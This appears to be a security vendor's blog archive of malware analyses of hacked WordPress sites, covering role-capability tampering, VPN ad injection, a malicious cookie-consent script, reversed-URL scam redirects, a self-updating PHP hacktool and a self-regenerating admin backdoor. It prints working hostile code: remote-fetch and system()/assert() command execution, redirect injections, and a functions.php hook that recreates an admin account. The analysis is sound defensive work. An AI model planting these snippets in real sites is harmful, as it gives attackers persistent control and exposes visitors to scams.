Tag: Hacked Websites

Using Innocent roles to hide admin users

All across the internet we find guides and tutorials on how to keep your WordPress site secure, and they all approach the concept of user roles, but not many actually approach the capabilities of those roles.


The way the capabilities are handled on WordPress make it quite easy to change what each role is allowed to do.

How WordPress Sets Role Capabilities

To better understand, we need to first look at how WordPress manages the capabilities of the roles (what it is allowed to do, be it either add/remove users, create/delete posts, etc...). This is defined on the database, in the wp_options table option_name - wp_user_roles

The Risk

As we previously experienced, attackers are focusing on modifying serialized data within the wp_options table.Due to the feeling that webmasters understand the role “Subscriber” can’t do much about this becomes a serious problem attackers can leverage by simply modifying the wp_user_roles field on the wp_options table (see below):

(Note: The attackers first need to either compromise your website or gain database access in order to accomplish this.)

Attackers can quite easily give every subscriber full administration capabilities. Allow me to show you by using the plugin Capability Manager Enhanced

Any subscriber would be able to do pretty much whatever they wanted without you noticing because the list of users would still list the same number of administrators and subscribers.

The only problem with this is that “Subscriber” is a full administrator.

If we compare it with how it is supposed to look under the default role settings, we can see how damaging the small change can be for the website.

Conclusion

What if instead of just one subscriber, there were hundreds, even thousands? What if it was a shop and all your customers were now basically administrators?

WordPress does not have a mechanism to warn a Webmaster if roles other than the “Administrator” has those capabilities.Seeing as this can be set on any role present on your website, it’s very important to keep a sharp eye on the capabilities of each role (especially post-compromise) as it can be easily used as a backdoor to your website. Usage of plugins that manage the capabilities can make this easier for webmasters without technical know-how.

Jul 18, 2018 by Cesar Anjos

Hackers Are Just as Vulnerable as You

I came across some interesting defacement pages recently and noticed a peculiar JavaScript injection included within each source code of the defaced websites. As shown below, this JavaScript injection was peculiar as it seemingly provided no benefit to the hacker:

<script>
    ANCHORFREE_VERSION = "623161526"

<script type='text/javascript'>
    var _AF2$ = {
        'SN': 'HSSHIELD00TN',
        'IP': '69.22.172.11',
        'CH': 'HSSCNL000393',
        'CT': '0',
        'HST': '&sessStartTime=0&SFLAG=1&in=1423962910_84044764|d,1553137850|w,1553137850|m,1553137850|t&out=1423962910_23400718|d,305397307|w,305397307|m,305397307|t&NUM_VID=2&NUM_VID_TS=1423962310&bChrome=40&pv=5&clsBtnCnt=14&fav=8&fvidat=0&fvidv=0&accessLP=1',
        'AFH': 'hss306',
        'RN': Math.floor(Math.random() * 999),
        'TOP': (parent.location != document.location || top.location != document.location) ? 0 : 1,
        'AFVER': '3.69',
        'fbw': false,
        'FBWCNT': 0,
        'FBWCNTNAME': 'FBWCNT_CHROME',
        'NOFBWNAME': 'NO_FBW_CHROME',
        'B': 'c',
        'VER': 'nonus'
    };
    if (_AF2$.TOP == 1) {
        document.write("<scr" + "ipt src='http[:]//box.anchorfree.net/insert/insert.php?sn=" + _AF2$.SN + "&ch=" + _AF2$.CH + "&v=" + ANCHORFREE_VERSION + 6 + "&b=" + _AF2$.B + "&ver=" + _AF2$.VER + "&afver=" + _AF2$.AFVER + "' type='text/javascript'></scr" + "ipt>");
    }

The injected javascript code contains some details from the client\'s connection to the HotSpot Shield VPN server, then runs a javascript file from box.anchorfree.net

I haven\'t come across this type of content within any other forms of malware – just your typical Hacked by _____, or 0wned by _____ message, or an otherwise unwanted defacement of someone\'s website.

It only took a single Google search to determine that anchorfree.net is associated with the popular HotSpot Shield VPN, which has millions of downloads in the Google Play store alone (they also offer browser plugins for non-mobile users). They offer both a free and a paid version of their VPN service, however in the last year or so there have been demands for federal authorities to investigate them for deceptive practices.

(If you are curious about using a VPN for privacy reasons, or already are using one, then I\'d recommend checking out the official complaint here).

So what does this have to do with hackers and their defacement pages? Well, we know that in the majority of cases, the hacker is wanting to anonymize themselves. Nowadays, that usually involves using at least one VPN or more. Often times, the hackers that focus on defacements are more inexperienced and new, so they may lack the inherent suspicion one has to have when dealing with free services like HotSpot Shield VPN or any other free online services they must monetize to remain in operation. Their form of monetization is to inject JavaScript code into the browser requests of their non-paying clients (unsure about the Premium paid version), which is then used with additional JavaScript from a few different third-party domains:

document.write("<style type='text/css' title='AFc_css"
+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{}.AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+"
:visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;
left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>
<style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style>
<img src=\"about:blank\" id=\"AFhss_trk0\" name=\"AFhss_trk0\"
 style=\"display:none\" /><img src=\"about:blank\"id=\"AFhss_trk\" 
name=\"AFhss_trk\" style=\"display:none\"/><iframe src=\"http://anchorfree.us/quantcast.php\" style=\"width:0px;height:0px;display:none;\"></iframe>");

Just a small excerpt of the nearly 2,000 line JavaScript text showcasing some of the hidden CSS styling and also the setup of an invisible iFrame, which is a popular method of delivering malicious JavaScript payloads.

As this article isn't about HotSpot Shield VPN specifically, I won't go too in depth about it, but suffice it to say this JavaScript code from their controlled domains is using tracking images and injecting advertisements (some of which could be malicious) into their client's browser.

The purpose of explaining this, was to showcase how even hackers can be victims to one of the biggest hurdles known in website security and that is the human's ability to override otherwise secure settings. This is most commonly witnessed in a human downloading some type of software – in this case, a free VPN service –unknowingly exposing themselves to malicious or PUP (potentially unwanted programs). Another common method of the human factor failing otherwise secure settings is through social engineering.

In conclusion, one should be suspicious of products advertised as completely free and should try to understand the terms of service (SLA) so they are aware of what they may be giving away or exposed to in exchange for the free service. In these defacement cases, the inexperienced hacker relied upon a free VPN service that was unknowingly injecting JavaScript to his browser and so when they created the defacement page (likely through an online editor or browser interface) it caused the HotSpot Shield VPN JavaScript to get passed as text to the created defacement page rather than executed within the client's browser as is intended.

Jun 15, 2018 by Luke Leal

Cookie consent script used to distribute malware

Since the new website cookie usage regulations in the EU have come into place, many websites have added a warning on their website about how they use cookies on it and as well, ask for your consent.


This has caused many website owners to look for an easy way to implement this and we recently found one website which was using JavaScript from cookiescript[.]info to display this cookie consent request on their website. When visiting the website for the first time via Chrome, you would get a JavaScript alert saying: “Your computer is infected. You have to check it with antivirus.”

You can try to click Cancel or OK but in both cases you are going to get redirected to a website trying to convince you to buy antivirus software which could be malware. It looks like the website cookiescript.info is the one distributing this malware to unsuspecting users.

The malware we caught, attempted to load JavaScript from here:
cdn.front.to/libs/cookieconsent.min.4.js

That link just redirects to this URL:
hxxp://cdn[.]cookiescript[.]info/libs/cookiescript.min.js

Here is some of the code inside this JavaScript:

As you can see, it’s loading some additional JavaScript; this time it's “hxxp://cdn[.]cookiescript[.]info/libs/detect_ga.js”, and is the one responsible for detecting the user agent, attaching the cookie to your browser. Here is some of the code:

Finally, this code gets loaded. It has the alert message, along with the code responsible for the redirect to the malicious website selling you the antivirus software:

hxxp://jsserver[.]info/alert.php

You can see the code here:

The website cookiescript.info appears to be using Cloudflare to hide its IP addresses, and the domain is protected by WhoisGuard, so there is no easy way to say who owns this website. However, after some more digging, I was able to find some more details.

cookiescript[.]info. 86399 IN NS fred.ns.cloudflare.com.
cookiescript[.]info. 86399 IN NS mia.ns.cloudflare.com.

It appears that cookie-consent.org and front.to are also part of the same network. We also found some evidence which suggests that the malware has been operating for a few months already.

We highly recommend inspecting code before adding it to your website. It's always best for you to host the entire code on your own server instead of an external website which can be compromised or simply be owned by malicious users.

May 29, 2018 by Krasimir Konov

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table.


$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www/​/:ptth'=ferh.​noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1=​=3){var delay = 15000;setTimeout(​$vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with probability of around 20%), after a timeout of 15 seconds, redirects visitors various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently)and balans.shahterworld[.]org

The very first redirect URL is hard-coded in the reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this

document.location​.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It’s is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs – all of them on hacked sites themselves.

hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.phphxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.phphxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.phphxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

As always, if you need a professional help to clean and protect your site, you can count on us.

Dec 14, 2017 by Denis Sinegubko

Simple self updating hacktool

While working on a compromised website, it's very common to encounter hacktools. Those are like the attackers' swiss knife, allowing them to perform several tasks such as: DoS attacks, execute server level exploits and even simple filemanagers.


Sometime though, we find some very clever ones, such as this one infecting a WordPress website. It was able to download updated malware content from the internet and spread it to a new file.

The original code was hiding inside a Theme file:

wp-content/themes/THEME_NAME/framework/admin/framework-updates.php

The file content was obfuscated, as usual. Here's a small portion of it:

>>> ${"x47x4cOx42Ax4cx53"}["xx70tx68x62x62ent"]="cx64x78";${"GLOx42x41Lx53"}["x73ex6fx70ch"]="x62x6bx61vx64ox6ee";${"x47x4cx4fx42Ax4cx53"}["x70x65xx6bx78x79"]="x6fx70x65x6e";

Once decoded, the real code can be separated into two sections.

The first part uses a .tmp ("temporary") file stored into WordPress' uploads directory and it is used to detect whether this server has been already compromised or not:

<?php
error_reporting(0);
ini_set("display_errors",0);
$string=__FILE__;
if(strtolower(substr(PHP_OS,0,3))=="win")
$os="win";
else
$os="nix";
if($os=="win"){
while((substr($string,-1)!="\"))
$string=substr_replace($string,"",-1);
$filename=$string."..\..x5c..\..x5cuploads\tmp.tmp";
}
else{
while((substr($string,-1)!="/"))
$string=substr_replace($string,"",-1);
$filename=$string."../../../../uploads/tmp.tmp";
}
if(file_exists($filename)){
}
else{
$from_set="sahifa511@".$_SERVER["SERVER_NAME"];
$to="themesrv1@commandandcontrol.infected";
$subject="Accepted";
$header="from: ".$from_set;
$message="Link : http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]."rn";
$message.="Path : ".__file__;
$sentmail=@mail($to,$subject,$message,$header);
if($sentmail==true){
$open=fopen($filename,"w");
}
else{
};
}
?>

The code prepares the file path, adapting accordingly to the server's OS. Once the file path is ready, it checks for its existence.

If the file already exists, then nothing happens (empty IF block above). Otherwise, the code notifies the attacker via email and writes the file to the disk, which acts as flag for future executions.

The second part the code shows the attack's potential:

<?
if(isset($_POST["oldmtsfeatures"])){
$file=file_get_contents("http://infected.dom/newfile");
$open=fopen(getcwd()."/wp-mail-sample.php","w");
$yes=fwrite($open,"<?php $file ?>");
if($yes){
echo"<br>done";
}
else
echo"SomethingWentWrong";
if(isset($_POST["elf"])){
$elf=$_POST["elf"];
switch($elf){
CASE 1:{
$file=file_get_contents("http://files.hackingtruth.org/raw/0.txt");
$open=fopen($string."themefile1.php","w");
$yes=fwrite($open,"<?php $file ?>");
echo"1 executed";
break;
}
CASE 2:{
$file=file_get_contents($_POST["addr"]);
$open=fopen($string.$_POST["filewithext"],"w");
$yes=fwrite($open,"$file");
echo"2 executed";
break;
}
CASE 3:{
$cdx=$_POST["cdx"];
$bkavdone='system';
$bkavdone($cdx);
break;
}
CASE 4:{
call_user_func_array("assert", array($_REQUEST["comnd"]));
break;
}
}
}
}
?>

If the attacker posts any content on a "oldmtsfeatures" key, the actual hacktool is executed, and the code is able to spread the infection:

It downloads malware from a remote site and saves it to another file inside the theme's folder: wp-mail-sample.php

The attacker will use the elf option to select what action the malware will perform.

Options 1 and 2 are yet another spreading tools, which downloads code from another URL, fixed or obtained via POST, and saves it as theme file. Again, the file name could be fixed (themefile1.php) or obtained via POST. Case 2 in particular is very clever, since the malware is able to overwrite itself, with an updated version of the hacktool.

Options 3 and 4 are the most destructive part of the code, since they perform Remote Code Execution. The attacker sends it command to be run via POST, and executes them using a regular system() call or via a more clever execution of PHP's assert() function.

Sep 26, 2017 by Pedro Peixoto

Soccer spam. Really?

In the last few months, we've covered several cases of SEO Spam in our labs and blog that were promoting products and services ranging from essay writing to sunglasses. From time to time, these Spam campaigns change and attackers focus on topics that may bring additional revenue. This time around, the topic was Soccer 🙂


During an Incident Response process, we found several files on the website's root folder that had nothing to do with the actual website content. Those files had PHP extensions and their filenames were either just numbers, e.g.: 1.php, 2.php, 5.php, ... or soccer team names; for instance, Real-Madrid.php, Barcelona.php, Chelsea.php, etc.

When accessing those files on a browser, we see an attempt to impersonate a Swedish online store, as you can see in the following screenshots:

In addition to that, there's a hidden iframe being loaded at the bottom pointing to hxxp://www[.]fabriksforsaljning[.]com (doesn't seem to exist anymore).

Remember that removing the offending files will not prevent your site to be attacked and infected again, since those files were uploaded using a backdoor or stolen/leaked credentials to your site. Check your access logs and ftp logs for any strange activity. This will help identifying any malicious code used to upload those files. Also, if you need professional security assistance to clean up your website, let us know.

Sep 21, 2017 by Fernando Barbosa

Evil Self-Regenerating WordPress Administrator User

Attackers often aim to conceal their presence using different methods, such as injecting redirect scripts, creating spam pages, or hiding a mailer in checkout pages to steal credit cards; but this is not always the case.


We've seen some websites where hackers were doing the very opposite. Recently, we noticed a malicious administrative user who had managed making a permanent account to the system. When the actual website administrator attempted to remove the bad guy, WordPress reported that the user was successfully deleted. However, after reopening the Users tab, the unwanted admin user appeared again as if nothing happened.

Such behavior gives the impression that the user is a permanent part of the system since they remained in the Users tab!

After the investigation, we found that the following code was injected in the website theme functions.php file:

function admin_account(){$user = 'admin2';$pass = 'Abc12345!'; $email = 'email2@domain.com';if ( !username_exists( $user ) && !email_exists( $email ) ) {$user_id = wp_create_user( $user, $pass, $email );$user = new WP_User( $user_id );$user->set_role( 'administrator' );} }add_action('init','admin_account');

What does this snippet mean? The code is pretty simple. We can see that it defines the function named admin_account. It specifies only three parameters required for user creation – user, password, and email.

Then the if conditional statement checks if the user is already present on the system. - and if not - it creates a new one. So, the regenerating function is ready. What next?

The function needs to be triggered quite often to grant the bad user ability to regenerate immediately. For that purpose, attackers have added the last part of the code, binding the admin_account function to the init action which is triggered when most of the WordPress is loaded.

Removing the mentioned code from functions.php file ceased the "immortality" of the bad user and evil was banished.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website, even if the obvious backdoor is removed. Knowing your site’s structure and performing an active monitoring of it (being alerted whenever a file is changed or added to your site) will help you to identify the alien admin users and unwanted code injections.

If you see your site having unwanted administrator users but you can’t locate the code that is creating them, you might want to have us scan your site for malware and clean it.

Sep 1, 2017 by Andrey Kucherov